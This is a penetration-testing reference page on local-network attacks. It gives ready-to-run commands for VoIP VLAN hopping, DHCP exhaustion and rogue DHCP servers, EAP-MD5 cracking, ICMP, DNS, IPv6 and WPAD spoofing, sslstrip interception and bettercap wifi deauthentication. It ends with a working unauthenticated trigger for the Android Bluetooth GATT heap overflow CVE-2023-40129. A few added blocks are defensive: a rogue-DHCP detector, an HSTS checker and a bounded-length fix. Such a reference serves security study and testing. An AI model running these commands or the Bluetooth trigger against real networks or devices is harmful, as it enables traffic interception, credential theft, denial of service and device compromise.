  3. Spoof with Pre-made Packet Mode (-c 2): Sends packets identical to those of a specific Cisco IP phone model.

The preferred mode for speed is the third one. It requires specifying:

  • The attacker's network interface (-i parameter).
  • The name of the VoIP device being emulated (-E parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address).

In corporate settings, to mimic an existing VoIP device, one might:

  • Inspect the MAC label on the phone.
  • Navigate the phone's display settings to view model information.
  • Connect the VoIP device to a laptop and observe CDP requests using Wireshark.

An example command to execute the tool in the third mode would be:

```bash
voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
```

DHCP Attacks

Enumeration

```bash
nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
```

DoS

Two types of DoS can be performed against DHCP servers. The first one consists in simulating enough fake hosts to use up all the possible IP addresses.
This attack will work only if you can see the responses of the DHCP server and complete the protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). For example, this is not possible in Wifi networks.

Another way to perform a DHCP DoS is to send a DHCP-RELEASE packet using every possible IP as the source. Then, the server will think that everybody has finished using its IP.

```bash
yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed
```

A more automatic way of doing this is using the tool DHCPing

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and to exhaust legitimate servers so they become unresponsive. So when the legitimate clients try to reconnect, you can serve the malicious values mentioned in the next attack.

Set malicious values

A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack.

Below are the command options for configuring the rogue DHCP server:

  • Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine's IP as the gateway.
  • Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
  • Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
  • Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
  • Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
  • Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
  • Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
  • WPAD Configuration Address: Use -w "http://10.0.0.100/wpad.dat" to set the address for the WPAD configuration, assisting in web traffic interception.
  • Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
  • Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.

```bash
# Example to start a rogue DHCP server with specified options
python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R
```
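As an added example from the detection side (not part of the original page or of Responder), a Python DHCP decoder that reads the fields shown in the nmap output above and compares the server identifier, router, DNS and WPAD options of an OFFER against an allowlist of known infrastructure; the rogue sample reuses the values the Responder options above would push. All packets are constructed inline.

```python
import ipaddress
import struct
from typing import Dict, List, Set

MAGIC_COOKIE = b"\x63\x82\x53\x63"
MSG_TYPES = {1: "DHCPDISCOVER", 2: "DHCPOFFER", 3: "DHCPREQUEST", 5: "DHCPACK", 6: "DHCPNAK"}
ADDRESS_OPTIONS = {1: "subnet_mask", 3: "router", 6: "dns", 54: "server_id"}
OPT_LEASE, OPT_MSG_TYPE, OPT_DOMAIN, OPT_WPAD = 51, 53, 15, 252


def _ip(raw: bytes) -> str:
    return str(ipaddress.ip_address(raw))


def _opt(code: int, data: bytes) -> bytes:
    return bytes([code, len(data)]) + data


def build_offer(yiaddr: str, server_id: str, router: str, dns: str, domain: str = "",
                wpad: str = "", lease: int = 60, xid: int = 0x1234) -> bytes:
    """Constructed DHCPOFFER (UDP payload) shaped like the nmap output above."""
    packed = ipaddress.ip_address
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0)   # BOOTREPLY, Ethernet, hlen, hops, xid, secs, flags
    hdr += bytes(4) + packed(yiaddr).packed + packed(server_id).packed + bytes(4)   # ciaddr yiaddr siaddr giaddr
    hdr += bytes(16) + bytes(64) + bytes(128)              # chaddr, sname, file
    opts = _opt(OPT_MSG_TYPE, b"\x02") + _opt(54, packed(server_id).packed)
    opts += _opt(OPT_LEASE, struct.pack("!I", lease)) + _opt(1, packed("255.255.255.0").packed)
    opts += _opt(3, packed(router).packed) + _opt(6, packed(dns).packed)
    if domain:
        opts += _opt(OPT_DOMAIN, domain.encode())
    if wpad:
        opts += _opt(OPT_WPAD, wpad.encode())
    return hdr + MAGIC_COOKIE + opts + b"\xff"


def parse_dhcp(payload: bytes) -> Dict[str, object]:
    """Decode the fixed header and the options a rogue server would tamper with."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    op, _, _, _, xid = struct.unpack("!BBBBI", payload[:8])
    out: Dict[str, object] = {"op": op, "xid": xid, "yiaddr": _ip(payload[16:20])}
    i = 240
    while i < len(payload) and payload[i] != 255:          # 255 = end option
        code = payload[i]
        if code == 0:                                      # pad
            i += 1
            continue
        length = payload[i + 1]
        data = payload[i + 2:i + 2 + length]
        i += 2 + length
        if code in ADDRESS_OPTIONS:                        # may carry several addresses
            out[ADDRESS_OPTIONS[code]] = [_ip(data[j:j + 4]) for j in range(0, len(data), 4)]
        elif code == OPT_MSG_TYPE:
            out["msg_type"] = MSG_TYPES.get(data[0], data[0])
        elif code == OPT_LEASE:
            out["lease_time"] = struct.unpack("!I", data)[0]
        elif code == OPT_DOMAIN:
            out["domain"] = data.decode("ascii", "replace")
        elif code == OPT_WPAD:
            out["wpad"] = data.decode("ascii", "replace")
    return out


def rogue_indicators(msg: Dict[str, object], trusted: Dict[str, Set[str]]) -> List[str]:
    """Compare an OFFER/ACK against an allowlist of known servers, gateways and resolvers."""
    findings: List[str] = []
    if msg.get("msg_type") not in ("DHCPOFFER", "DHCPACK"):
        return findings
    for key, label in (("server_id", "DHCP server identifier"), ("router", "default gateway"), ("dns", "DNS server")):
        for addr in msg.get(key, []):
            if addr not in trusted.get(key, set()):
                findings.append(f"unexpected {label} {addr}")
    if "wpad" in msg:                                      # option 252 is the proxy-hijack vector
        findings.append(f"WPAD URL pushed via DHCP option 252: {msg['wpad']}")
    return findings
```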

EAP Attacks

Here are some of the attack tactics that can be used against 802.1X implementations:

  • Active brute-force password grinding via EAP
  • Attacking the RADIUS server with malformed EAP content (exploits)
  • EAP message capture and offline password cracking (EAP-MD5 and PEAP)
  • Forcing EAP-MD5 authentication to bypass TLS certificate validation
  • Injecting malicious network traffic upon authenticating using a hub or similar device

If the attacker is between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using:

```bash
eapmd5pass -r pcap.dump -w /usr/share/wordlist/sqlmap.txt
```

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps to distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.

GLBP & HSRP Attacks

RIP

Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. RIP and RIPv2 send datagrams to peers via port 520 using UDP, whereas RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast. RIPv2 introduced support for MD5 authentication. On the other hand, RIPng does not incorporate native authentication; instead, it relies on the optional IPsec AH and ESP headers within IPv6.

  • RIP and RIPv2: Communication is done through UDP datagrams on port 520.
  • RIPng: Uses UDP port 521 for broadcasting datagrams via IPv6 multicast.

Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on the IPsec AH and ESP headers in IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic routing protocol. It is a distance-vector protocol. If there is no authentication and no configuration of passive interfaces, an intruder can interfere with EIGRP routing and cause routing table poisoning. Moreover, the EIGRP network (in other words, the autonomous system) is flat and has no segmentation into any zones. If an attacker injects a route, it is likely that this route will propagate throughout the autonomous EIGRP system.

Attacking an EIGRP system requires establishing a neighborship with a legitimate EIGRP router, which opens up many possibilities, from basic reconnaissance to various injections.

FRRouting allows you to implement a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols. All you need to do is deploy it on your attacker's system and you can pretend to be a legitimate router in the routing domain.

EIGRP Attacks

Coly has the capability to intercept EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows injecting packets, which can be used to alter routing configurations.

OSPF

In the Open Shortest Path First (OSPF) protocol, MD5 authentication is commonly employed to ensure secure communication between routers. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and set the compromised key, the Injection and Connection tabs are used, respectively.

  • Capturing and Cracking MD5 Hashes: Tools like Loki and John the Ripper are used for this purpose.
  • Configuring Route Parameters: Done through the Injection tab.
  • Setting the Compromised Key: The key is set under the Connection tab.

Other Generic Tools & Sources

  • Above: Tool to monitor network traffic and find vulnerabilities
  • You can find some more information about network attacks here.

DHCP Spoofing

The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network by sending fake DHCP responses.

```bash
# Ettercap
yersinia dhcp -attack 2 #More parameters are needed
```

ARP Spoofing

Check the previous section.

ICMP Redirect

ICMP Redirect consists in sending an ICMP packet of type 5 code 1 (redirect for host, the same type and code the hping3 command below sets with -C 5 -K 1) indicating that the attacker is the best way to reach an IP. Then, when the victim wants to contact that IP, it will send the packet through the attacker.

```bash
# Ettercap plugin
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] from [2], route to [3] packets sent to [4] from [5]
```

DNS Spoofing

The attacker will resolve some (or all) of the domains that the victim requests.

```bash
# bettercap
set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
```

Configure your own DNS with dnsmasq

```bash
apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS
```

Local gateways

Often there are multiple routes to reach systems and networks. After building a list of MAC addresses within the local network, use gateway-finder.py to identify hosts that support IPv4 forwarding.

gateway-finder usage example
```bash
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
```

Spoofing LLMNR, NBT-NS, and mDNS

For local host resolution when DNS lookups fail, Microsoft systems rely on Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS). Similarly, Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. Because these protocols are unauthenticated and operate over UDP by broadcasting messages, attackers can exploit them to redirect users to malicious services.

You can impersonate services that hosts are looking for by using Responder to send fake responses.
Read here for more information about how to impersonate services with Responder.

Spoofing WPAD

Browsers commonly use the Web Proxy Auto-Discovery (WPAD) protocol to acquire proxy settings automatically. This involves fetching configuration details from a server, specifically via a URL such as "http://wpad.example.org/wpad.dat". Clients can discover this server in several ways:

  • Through DHCP, where discovery is facilitated by a special code 252 entry.
  • By DNS, which involves looking up a hostname labelled wpad within the local domain.
  • Via Microsoft LLMNR and NBT-NS, which are fallback mechanisms used when DNS lookups fail.

The Responder tool takes advantage of this protocol by acting as a malicious WPAD server. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. To dive deeper into how services can be impersonated using Responder check this.

Spoofing SSDP and UPnP devices

You can offer different services on the network to try to trick a user into entering plain-text credentials. More information about this attack in Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can make the victim believe that the IPv6 address of the GW has the MAC of the attacker.

```bash
sudo parasite6 -l eth0 # This option will respond to every request spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
```

IPv6 Router Advertisement Spoofing/Flooding

Some OS configure the gateway by default from the RA packets sent on the network. To declare the attacker as an IPv6 router you can use:

```bash
sysctl -w net.ipv6.conf.all.forwarding=1
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16
```

IPv6 DHCP spoofing

By default some OS try to configure the DNS by reading a DHCPv6 packet on the network. An attacker can then send a DHCPv6 packet to configure himself as the DNS server. The DHCP also provides an IPv6 address to the victim.

```bash
# bettercap
dhcp6.spoof on
dhcp6.spoof.domains <list of domains>
```

mitm6

HTTP (fake page and JS code injection)

Internet Attacks

sslStrip

Basically what this attack does is, in case the user tries to access an HTTP page that redirects to the HTTPS version, sslStrip will maintain an HTTP connection with the client and an HTTPS connection with the server, so it will be able to sniff the connection in plain text.

```bash
apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
```

More information here.

sslStrip+ and dns2proxy to bypass HSTS

The difference between sslStrip+ and dns2proxy and sslStrip is that they will redirect for example www.facebook.com to wwww.facebook.com (note the extra "w") and will set the address of this domain as the attacker IP. This way, the client will connect to wwww.facebook.com (the attacker) but behind the scenes sslstrip+ will maintain the real connection via https with www.facebook.com.

The goal of this technique is to avoid HSTS because wwww.facebook.com won't be saved in the browser's HSTS cache, so the browser will be tricked into performing the facebook authentication over HTTP.
Note that in order to perform this attack the victim has to initially try to access http://www.facebook.com and not https. This can be done by modifying the links inside an http page.

More information here, here and here.

sslStrip and sslStrip+ don't work anymore. This is because there are HSTS rules pre-saved in the browsers, so even if it's the first time that a user accesses an "important" domain he will access it via HTTPS. Also, notice that the pre-saved rules and other generated rules can use the flag includeSubdomains, so the wwww.facebook.com example from before won't work anymore as facebook.com uses HSTS with includeSubdomains.
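To see why the extra-"w" trick depends on includeSubdomains, here is an added example (not code from the original page, sslstrip+ or any browser) that parses a Strict-Transport-Security header the way an HSTS store would and decides whether a requested host is covered; the hosts and header values are constructed, and directive matching is a loose case-insensitive search rather than a full RFC 6797 tokenizer.

```c
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* HSTS entry as a browser would store it for the host that sent the header. */
typedef struct {
    char host[128];           /* issuing host, e.g. "facebook.com" */
    long max_age;             /* seconds; 0 means no (or expired) entry */
    bool include_subdomains;  /* includeSubDomains directive present */
} hsts_policy;

/* Case-insensitive search for `needle` in `hay`; returns NULL if absent. */
static const char *find_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (const char *p = hay; *p; p++)
        if (strncasecmp(p, needle, n) == 0) return p;
    return NULL;
}

/* Parse a Strict-Transport-Security value received over HTTPS from `host`.
 * A header without max-age is invalid per RFC 6797 and yields no entry. */
hsts_policy hsts_parse(const char *host, const char *hdr) {
    hsts_policy pol = { {0}, 0, false };
    strncpy(pol.host, host, sizeof pol.host - 1);
    const char *ma = find_ci(hdr, "max-age=");
    pol.max_age = ma ? strtol(ma + 8, NULL, 10) : 0;
    pol.include_subdomains = find_ci(hdr, "includeSubDomains") != NULL;
    return pol;
}

/* Does the stored entry force HTTPS for `req`? The issuing host is always
 * covered; a subdomain (dot-boundary suffix match) only with includeSubDomains. */
bool hsts_covers(const hsts_policy *pol, const char *req) {
    size_t hl = strlen(pol->host), rl = strlen(req);
    if (pol->max_age <= 0) return false;
    if (rl == hl) return strcasecmp(req, pol->host) == 0;
    if (!pol->include_subdomains || rl <= hl + 1) return false;
    return req[rl - hl - 1] == '.' && strcasecmp(req + rl - hl, pol->host) == 0;
}
```

With a host-only entry for www.facebook.com, wwww.facebook.com is not covered and the downgrade would succeed; with an includeSubDomains entry for facebook.com it is covered and the browser upgrades the request before it leaves.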

TODO: easy-creds, evilgrade, metasploit, factory

Listen for TCP on a port

```bash
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
```

TCP + SSL listen on a port

Generate a key and a self-signed certificate

```bash
FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
```

Listen using the certificate

```bash
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
```

Listen using the certificate and redirect to the hosts

```bash
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0
```

Sometimes, if the client checks that the CA is valid, you could serve a certificate for another hostname signed by a CA.
Another interesting test is to serve a certificate for the requested hostname but self-signed.

Other things to test are signing the certificate with a valid certificate that is not a valid CA. Or using the valid public key, forcing the use of an algorithm like Diffie-Hellman (one that doesn't need to decrypt anything with the real private key) and, when the client requests a proof of the real private key (like a hash), sending a fake proof and hoping that the client doesn't check it.

Bettercap

Common Bettercap commands
```bash
# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latest 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
```

Active Discovery Notes

Take into account that when a UDP packet is sent to a device that doesn't have the requested port open, an ICMP (Port Unreachable) is sent back.

ARP discover

ARP packets are used to discover which IPs are in use inside the network. The PC has to send a request for every possible IP address and only the ones in use will respond.

mDNS (multicast DNS)

Bettercap sends an mDNS request (every X ms) asking for _services_.dns-sd._udp.local. The machine that sees this packet usually answers the request. Then, it only looks for machines answering for "services".

Tools

  • Avahi-browser (--all)
  • Bettercap (net.probe.mdns)
  • Responder

NBNS (NetBios Name Server)

Bettercap broadcasts packets to port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap broadcasts SSDP packets searching for all kinds of services (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap broadcasts WSD packets searching for services (UDP Port 3702).

Bluetooth Attacks (L2CAP/ATT/GATT)

  • Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
                        bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
                        uint16_t my_mtu, uint16_t required_remote_mtu,
                        uint16_t sec_level);
```
  • The BlueBlue framework enables crafting L2CAP/ATT with Scapy (built on top of the BlueBorne l2cap_infra). Example:
```python
# ACLConnection, PSM_ATT, p8 and p16 are BlueBlue framework helpers
acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())
```
  • CVE-2023-40129 (Fluoride GATT): an integer underflow in the Read Multiple Variable response builder can cause a heap overflow of approximately 64 KB when the MTU truncates a variable-length element but the +2 length field is ignored.
Root cause (GATT Read Multiple Variable)
```c
static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
  uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false;
  len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;
  BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET;
  p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR;
  p_buf->len=1;
  for (ii=0; ii<p_cmd->multi_req.num_handles; ii++) {
    tGATTS_RSP* p_rsp = ...; // dequeued
    if (p_rsp) {
      total_len = (p_buf->len + p_rsp->attr_value.len);
      if (p_cmd->multi_req.variable_len) total_len += 2;
      if (total_len > mtu) {
        len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2
        is_overflow = true;
      } else { len = p_rsp->attr_value.len; }
      if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; }
      memcpy(p, p_rsp->attr_value.value, len); // heap overflow
      if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break;
    }
  }
}
```
  • For variable-length entries, the overflow path subtracts only (total_len - mtu), ignoring the +2 length field, so len underflows (e.g., 0xFFFE) and memcpy writes ~64 KB past the end of the buffer.
  • Minimal unauthenticated trigger (a small MTU forces the underflow on the 4th attribute):
```python
# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
# ACLConnection, PSM_ATT and p16 are BlueBlue framework helpers
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite
```
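As an added example (not Fluoride's code, the upstream patch, or a BlueBlue script), the truncation arithmetic from build_read_multi_rsp is isolated below next to a bounded version, so the uint16_t wrap the bullets describe can be checked with the page's own numbers (p_buf->len = 55, attribute length 16, MTU 55); the function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* How many attribute bytes the response builder decides to copy. */
typedef struct {
    uint16_t len;      /* bytes that memcpy would copy */
    bool     overflow; /* response is full after this entry */
} trunc_result;

/* Vulnerable form, mirroring the snippet above: total_len charges the 2-byte
 * length prefix of a variable-length entry, but the truncation subtracts the
 * whole excess from attr_len alone. Stored in uint16_t, the result wraps as
 * soon as the excess exceeds attr_len (here 16 - 18 = -2 -> 0xFFFE). */
trunc_result trunc_vulnerable(uint16_t buf_len, uint16_t attr_len,
                              bool variable_len, uint16_t mtu) {
    trunc_result r = { attr_len, false };
    uint16_t total_len = (uint16_t)(buf_len + attr_len);
    if (variable_len) total_len += 2;
    if (total_len > mtu) {
        r.len = (uint16_t)(attr_len - (total_len - mtu)); /* BUG: ignores +2 */
        r.overflow = true;
    }
    return r;
}

/* Bounded form: compute the room left after the prefix first and clamp the
 * copy length to it, so len can never exceed attr_len or the buffer. A caller
 * must also skip writing the prefix when room is 0. */
trunc_result trunc_bounded(uint16_t buf_len, uint16_t attr_len,
                           bool variable_len, uint16_t mtu) {
    uint16_t prefix = variable_len ? 2 : 0;
    uint16_t used = (uint16_t)(buf_len + prefix);
    uint16_t room = (used < mtu) ? (uint16_t)(mtu - used) : 0;
    trunc_result r = { attr_len < room ? attr_len : room, attr_len > room };
    return r;
}

/* Replays the trigger above: four 16-byte variable-length attributes at MTU 55.
 * Returns the copy length the vulnerable path uses on the fourth entry. */
uint16_t replay_fourth_entry(void) {
    uint16_t buf_len = 1;              /* opcode byte already written */
    trunc_result r = { 0, false };
    for (int i = 0; i < 4 && !r.overflow; i++) {
        r = trunc_vulnerable(buf_len, 16, true, 55);
        buf_len = (uint16_t)(buf_len + 2 + r.len);
    }
    return r.len;
}
```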

Telecom / Mobile-Core (GTP) Exploitation

Telecom Network Exploitation
